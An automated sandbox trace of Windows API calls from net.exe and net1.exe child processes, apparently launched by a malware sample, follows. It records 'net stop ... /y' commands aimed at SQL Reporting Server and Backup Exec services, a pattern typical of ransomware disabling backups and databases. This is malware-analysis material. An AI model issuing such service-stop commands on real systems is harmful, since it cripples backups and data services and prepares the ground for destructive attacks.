4 [0216.358] _wcsicmp (_String1="wksta", _String2="SNAC") returned 4 [0216.358] _wcsicmp (_String1="prdr", _String2="SNAC") returned -3 [0216.358] _wcsicmp (_String1="devrdr", _String2="SNAC") returned -15 [0216.358] _wcsicmp (_String1="lanmanworkstation", _String2="SNAC") returned -7 [0216.358] _wcsicmp (_String1="server", _String2="SNAC") returned -9 [0216.358] _wcsicmp (_String1="svr", _String2="SNAC") returned 8 [0216.358] _wcsicmp (_String1="srv", _String2="SNAC") returned 4 [0216.358] _wcsicmp (_String1="lanmanserver", _String2="SNAC") returned -7 [0216.358] _wcsicmp (_String1="alerter", _String2="SNAC") returned -18 [0216.358] _wcsicmp (_String1="netlogon", _String2="SNAC") returned -5 [0216.358] NetServiceControl (in: servername=0x0, service="SNAC", opcode=0x0, arg=0x0, bufptr=0x1efbe4 | out: bufptr=0x1efbe4) returned 0x889 [0216.359] wcscpy_s (in: _Destination=0xfa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0216.360] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0216.360] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xfb338, nSize=0x800, Arguments=0xf9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0216.361] GetFileType (hFile=0x26c) returned 0x3 [0216.361] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x563fd0 [0216.361] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x563fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0216.361] WriteFile (in: hFile=0x26c, lpBuffer=0x563fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efb24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efb24, lpOverlapped=0x0) returned 0 [0216.362] LocalFree (hMem=0x563fd0) returned 0x0 [0216.362] GetFileType (hFile=0x26c) returned 0x3 [0216.362] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x566278 [0216.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x566278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0216.362] WriteFile (in: hFile=0x26c, lpBuffer=0x566278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efb24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efb24, lpOverlapped=0x0) returned 0 [0216.362] LocalFree (hMem=0x566278) returned 0x0 [0216.362] _ultow (in: _Dest=0x889, _Radix=2030420 | out: _Dest=0x889) returned="2185" [0216.362] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xfb338, nSize=0x800, Arguments=0xf9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0216.362] GetFileType (hFile=0x26c) returned 0x3 [0216.362] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x566278 [0216.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x566278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0216.362] WriteFile (in: hFile=0x26c, lpBuffer=0x566278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1efb30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efb30, lpOverlapped=0x0) returned 0 [0216.362] LocalFree (hMem=0x566278) returned 0x0 [0216.362] GetFileType (hFile=0x26c) returned 0x3 [0216.362] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x566278 [0216.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x566278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0216.362] WriteFile (in: hFile=0x26c, lpBuffer=0x566278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efb30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efb30, lpOverlapped=0x0) returned 0 [0216.362] LocalFree (hMem=0x566278) returned 0x0 [0216.363] NetApiBufferFree (Buffer=0x561c50) returned 0x0 [0216.363] NetApiBufferFree (Buffer=0x561c68) returned 0x0 [0216.363] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SNAC /y" [0216.363] exit (_Code=2) Process: id = "354" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x17239000" os_pid = "0x7bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 527 os_tid = 0xb08 Process: id = "355" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5d3e3000" os_pid = "0x7f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "354" os_parent_pid = "0x7bc" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 528 os_tid = 0x150 [0216.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27ff08 | out: lpSystemTimeAsFileTime=0x27ff08*(dwLowDateTime=0x4a3a9300, dwHighDateTime=0x1d57a87)) [0216.498] GetCurrentProcessId () returned 0x7f8 [0216.498] GetCurrentThreadId () returned 0x150 [0216.498] GetTickCount () returned 0x116fac4 [0216.498] QueryPerformanceCounter (in: lpPerformanceCount=0x27ff00 | out: lpPerformanceCount=0x27ff00*=33678233806) returned 1 [0216.498] GetModuleHandleA (lpModuleName=0x0) returned 0xb80000 [0216.498] __set_app_type (_Type=0x1) [0216.498] __p__fmode () returned 0x74eb31f4 [0216.498] __p__commode () returned 0x74eb31fc [0216.498] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb8ffe6) returned 0x0 [0216.498] __getmainargs (in: _Argc=0xb99064, _Argv=0xb9906c, _Env=0xb99068, _DoWildCard=0, _StartInfo=0xb99024 | out: _Argc=0xb99064, _Argv=0xb9906c, _Env=0xb99068) returned 0 [0216.498] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.499] GetConsoleOutputCP () returned 0x1b5 [0216.499] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb99080 | out: lpCPInfo=0xb99080) returned 1 [0216.499] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.512] sprintf_s (in: _DstBuf=0x27fec0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0216.512] setlocale (category=0, locale=".437") returned="English_United States.437" [0216.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0216.514] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0216.514] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" [0216.514] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0216.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x7e) returned 0x2e3c20 [0216.515] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0216.515] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fe90 | out: Buffer=0x27fe90*=0x2e1c80) returned 0x0 [0216.515] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fe90 | out: Buffer=0x27fe90*=0x2e1c98) returned 0x0 [0216.515] _fileno (_File=0x74eb2900) returned -2 [0216.515] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0216.515] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0216.515] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0216.515] _wcsicmp (_String1="config", _String2="stop") returned -16 [0216.515] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0216.515] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0216.515] _wcsicmp (_String1="file", _String2="stop") returned -13 [0216.516] _wcsicmp (_String1="files", _String2="stop") returned -13 [0216.516] _wcsicmp (_String1="group", _String2="stop") returned -12 [0216.516] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0216.516] _wcsicmp (_String1="help", _String2="stop") returned -11 [0216.516] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0216.516] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0216.516] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0216.516] _wcsicmp (_String1="session", _String2="stop") returned -15 [0216.516] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0216.516] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0216.516] _wcsicmp (_String1="share", _String2="stop") returned -12 [0216.516] _wcsicmp (_String1="start", _String2="stop") returned -14 [0216.516] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0216.516] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0216.516] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0216.516] _wcsicmp (_String1="accounts", _String2="ReportServer$SQL_2008") returned -17 [0216.516] _wcsicmp (_String1="computer", _String2="ReportServer$SQL_2008") returned -15 [0216.516] _wcsicmp (_String1="config", _String2="ReportServer$SQL_2008") returned -15 [0216.516] _wcsicmp (_String1="continue", _String2="ReportServer$SQL_2008") returned -15 [0216.516] _wcsicmp (_String1="cont", _String2="ReportServer$SQL_2008") returned -15 [0216.516] _wcsicmp (_String1="file", _String2="ReportServer$SQL_2008") returned -12 [0216.516] _wcsicmp (_String1="files", _String2="ReportServer$SQL_2008") returned -12 [0216.516] _wcsicmp (_String1="group", _String2="ReportServer$SQL_2008") returned -11 [0216.516] _wcsicmp (_String1="groups", _String2="ReportServer$SQL_2008") returned -11 [0216.516] _wcsicmp (_String1="help", _String2="ReportServer$SQL_2008") returned -10 [0216.516] _wcsicmp (_String1="helpmsg", _String2="ReportServer$SQL_2008") returned -10 [0216.516] _wcsicmp (_String1="localgroup", _String2="ReportServer$SQL_2008") returned -6 [0216.516] _wcsicmp (_String1="pause", _String2="ReportServer$SQL_2008") returned -2 [0216.516] _wcsicmp (_String1="session", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="sessions", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="sess", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="share", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="start", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="stats", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="statistics", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="stop", _String2="ReportServer$SQL_2008") returned 1 [0216.516] _wcsicmp (_String1="time", _String2="ReportServer$SQL_2008") returned 2 [0216.516] _wcsicmp (_String1="user", _String2="ReportServer$SQL_2008") returned 3 [0216.517] _wcsicmp (_String1="users", _String2="ReportServer$SQL_2008") returned 3 [0216.517] _wcsicmp (_String1="msg", _String2="ReportServer$SQL_2008") returned -5 [0216.517] _wcsicmp (_String1="messenger", _String2="ReportServer$SQL_2008") returned -5 [0216.517] _wcsicmp (_String1="receiver", _String2="ReportServer$SQL_2008") returned -13 [0216.517] _wcsicmp (_String1="rcv", _String2="ReportServer$SQL_2008") returned -2 [0216.517] _wcsicmp (_String1="netpopup", _String2="ReportServer$SQL_2008") returned -4 [0216.517] _wcsicmp (_String1="redirector", _String2="ReportServer$SQL_2008") returned -12 [0216.517] _wcsicmp (_String1="redir", _String2="ReportServer$SQL_2008") returned -12 [0216.517] _wcsicmp (_String1="rdr", _String2="ReportServer$SQL_2008") returned -1 [0216.517] _wcsicmp (_String1="workstation", _String2="ReportServer$SQL_2008") returned 5 [0216.517] _wcsicmp (_String1="work", _String2="ReportServer$SQL_2008") returned 5 [0216.517] _wcsicmp (_String1="wksta", _String2="ReportServer$SQL_2008") returned 5 [0216.517] _wcsicmp (_String1="prdr", _String2="ReportServer$SQL_2008") returned -2 [0216.517] _wcsicmp (_String1="devrdr", _String2="ReportServer$SQL_2008") returned -14 [0216.517] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$SQL_2008") returned -6 [0216.517] _wcsicmp (_String1="server", _String2="ReportServer$SQL_2008") returned 1 [0216.517] _wcsicmp (_String1="svr", _String2="ReportServer$SQL_2008") returned 1 [0216.517] _wcsicmp (_String1="srv", _String2="ReportServer$SQL_2008") returned 1 [0216.517] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$SQL_2008") returned -6 [0216.517] _wcsicmp (_String1="alerter", _String2="ReportServer$SQL_2008") returned -17 [0216.517] _wcsicmp (_String1="netlogon", _String2="ReportServer$SQL_2008") returned -4 [0216.517] _wcsupr (in: _String="ReportServer$SQL_2008" | out: _String="REPORTSERVER$SQL_2008") returned="REPORTSERVER$SQL_2008" [0216.517] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e54f0 [0216.520] GetServiceKeyNameW (in: hSCManager=0x2e54f0, lpDisplayName="REPORTSERVER$SQL_2008", lpServiceName=0xb9aaf0, lpcchBuffer=0x27fe2c | out: lpServiceName="", lpcchBuffer=0x27fe2c) returned 0 [0216.520] _wcsicmp (_String1="msg", _String2="REPORTSERVER$SQL_2008") returned -5 [0216.520] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$SQL_2008") returned -5 [0216.520] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$SQL_2008") returned -13 [0216.520] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$SQL_2008") returned -2 [0216.520] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$SQL_2008") returned -12 [0216.520] _wcsicmp (_String1="redir", _String2="REPORTSERVER$SQL_2008") returned -12 [0216.520] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$SQL_2008") returned -1 [0216.520] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$SQL_2008") returned 5 [0216.520] _wcsicmp (_String1="work", _String2="REPORTSERVER$SQL_2008") returned 5 [0216.521] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$SQL_2008") returned 5 [0216.521] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$SQL_2008") returned -2 [0216.521] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$SQL_2008") returned -14 [0216.521] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$SQL_2008") returned -6 [0216.521] _wcsicmp (_String1="server", _String2="REPORTSERVER$SQL_2008") returned 1 [0216.521] _wcsicmp (_String1="svr", _String2="REPORTSERVER$SQL_2008") returned 1 [0216.521] _wcsicmp (_String1="srv", _String2="REPORTSERVER$SQL_2008") returned 1 [0216.521] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$SQL_2008") returned -6 [0216.521] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$SQL_2008") returned -17 [0216.521] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$SQL_2008") returned -4 [0216.521] NetServiceControl (in: servername=0x0, service="REPORTSERVER$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x27fe28 | out: bufptr=0x27fe28) returned 0x889 [0216.522] wcscpy_s (in: _Destination=0xb9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0216.522] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0216.522] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb9b338, nSize=0x800, Arguments=0xb99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0216.523] GetFileType (hFile=0x26c) returned 0x3 [0216.523] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2e4020 [0216.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2e4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n-", lpUsedDefaultChar=0x0) returned 30 [0216.524] WriteFile (in: hFile=0x26c, lpBuffer=0x2e4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27fd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fd68, lpOverlapped=0x0) returned 0 [0216.524] LocalFree (hMem=0x2e4020) returned 0x0 [0216.524] GetFileType (hFile=0x26c) returned 0x3 [0216.524] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e62c8 [0216.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0216.524] WriteFile (in: hFile=0x26c, lpBuffer=0x2e62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27fd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fd68, lpOverlapped=0x0) returned 0 [0216.524] LocalFree (hMem=0x2e62c8) returned 0x0 [0216.524] _ultow (in: _Dest=0x889, _Radix=2620824 | out: _Dest=0x889) returned="2185" [0216.524] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb9b338, nSize=0x800, Arguments=0xb99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0216.524] GetFileType (hFile=0x26c) returned 0x3 [0216.524] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2e62c8 [0216.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2e62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0216.524] WriteFile (in: hFile=0x26c, lpBuffer=0x2e62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27fd74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fd74, lpOverlapped=0x0) returned 0 [0216.524] LocalFree (hMem=0x2e62c8) returned 0x0 [0216.524] GetFileType (hFile=0x26c) returned 0x3 [0216.524] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e62c8 [0216.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0216.524] WriteFile (in: hFile=0x26c, lpBuffer=0x2e62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27fd74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fd74, lpOverlapped=0x0) returned 0 [0216.524] LocalFree (hMem=0x2e62c8) returned 0x0 [0216.525] NetApiBufferFree (Buffer=0x2e1c80) returned 0x0 [0216.525] NetApiBufferFree (Buffer=0x2e1c98) returned 0x0 [0216.525] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" [0216.525] exit (_Code=2) Process: id = "356" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5313e000" os_pid = "0x550" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 529 os_tid = 0xbc4 Process: id = "357" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5ee79000" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "356" os_parent_pid = "0x550" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 530 os_tid = 0x74c [0216.674] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xffd2c | out: lpSystemTimeAsFileTime=0xffd2c*(dwLowDateTime=0x4a572380, dwHighDateTime=0x1d57a87)) [0216.674] GetCurrentProcessId () returned 0xbe0 [0216.674] GetCurrentThreadId () returned 0x74c [0216.674] GetTickCount () returned 0x116fb7f [0216.674] QueryPerformanceCounter (in: lpPerformanceCount=0xffd24 | out: lpPerformanceCount=0xffd24*=33695878665) returned 1 [0216.674] GetModuleHandleA (lpModuleName=0x0) returned 0x670000 [0216.674] __set_app_type (_Type=0x1) [0216.674] __p__fmode () returned 0x74eb31f4 [0216.675] __p__commode () returned 0x74eb31fc [0216.675] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x67ffe6) returned 0x0 [0216.675] __getmainargs (in: _Argc=0x689064, _Argv=0x68906c, _Env=0x689068, _DoWildCard=0, _StartInfo=0x689024 | out: _Argc=0x689064, _Argv=0x68906c, _Env=0x689068) returned 0 [0216.675] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.675] GetConsoleOutputCP () returned 0x1b5 [0216.675] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x689080 | out: lpCPInfo=0x689080) returned 1 [0216.675] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.678] sprintf_s (in: _DstBuf=0xffce4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0216.679] setlocale (category=0, locale=".437") returned="English_United States.437" [0216.681] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0216.681] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0216.681] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" [0216.681] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xffab0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0216.681] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x88) returned 0x884c00 [0216.681] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0216.682] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xffcb4 | out: Buffer=0xffcb4*=0x881c98) returned 0x0 [0216.682] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xffcb4 | out: Buffer=0xffcb4*=0x881cb0) returned 0x0 [0216.682] _fileno (_File=0x74eb2900) returned -2 [0216.682] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0216.682] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0216.682] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0216.682] _wcsicmp (_String1="config", _String2="stop") returned -16 [0216.682] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0216.682] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0216.682] _wcsicmp (_String1="file", _String2="stop") returned -13 [0216.682] _wcsicmp (_String1="files", _String2="stop") returned -13 [0216.682] _wcsicmp (_String1="group", _String2="stop") returned -12 [0216.682] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0216.682] _wcsicmp (_String1="help", _String2="stop") returned -11 [0216.682] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0216.682] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0216.682] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0216.682] _wcsicmp (_String1="session", _String2="stop") returned -15 [0216.682] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0216.682] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0216.682] _wcsicmp (_String1="share", _String2="stop") returned -12 [0216.682] _wcsicmp (_String1="start", _String2="stop") returned -14 [0216.682] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0216.682] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0216.682] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0216.682] _wcsicmp (_String1="accounts", _String2="BackupExecAgentAccelerator") returned -1 [0216.682] _wcsicmp (_String1="computer", _String2="BackupExecAgentAccelerator") returned 1 [0216.682] _wcsicmp (_String1="config", _String2="BackupExecAgentAccelerator") returned 1 [0216.682] _wcsicmp (_String1="continue", _String2="BackupExecAgentAccelerator") returned 1 [0216.682] _wcsicmp (_String1="cont", _String2="BackupExecAgentAccelerator") returned 1 [0216.682] _wcsicmp (_String1="file", _String2="BackupExecAgentAccelerator") returned 4 [0216.682] _wcsicmp (_String1="files", _String2="BackupExecAgentAccelerator") returned 4 [0216.683] _wcsicmp (_String1="group", _String2="BackupExecAgentAccelerator") returned 5 [0216.683] _wcsicmp (_String1="groups", _String2="BackupExecAgentAccelerator") returned 5 [0216.683] _wcsicmp (_String1="help", _String2="BackupExecAgentAccelerator") returned 6 [0216.683] _wcsicmp (_String1="helpmsg", _String2="BackupExecAgentAccelerator") returned 6 [0216.683] _wcsicmp (_String1="localgroup", _String2="BackupExecAgentAccelerator") returned 10 [0216.683] _wcsicmp (_String1="pause", _String2="BackupExecAgentAccelerator") returned 14 [0216.683] _wcsicmp (_String1="session", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="sessions", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="sess", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="share", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="start", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="stats", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="statistics", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="stop", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="time", _String2="BackupExecAgentAccelerator") returned 18 [0216.683] _wcsicmp (_String1="user", _String2="BackupExecAgentAccelerator") returned 19 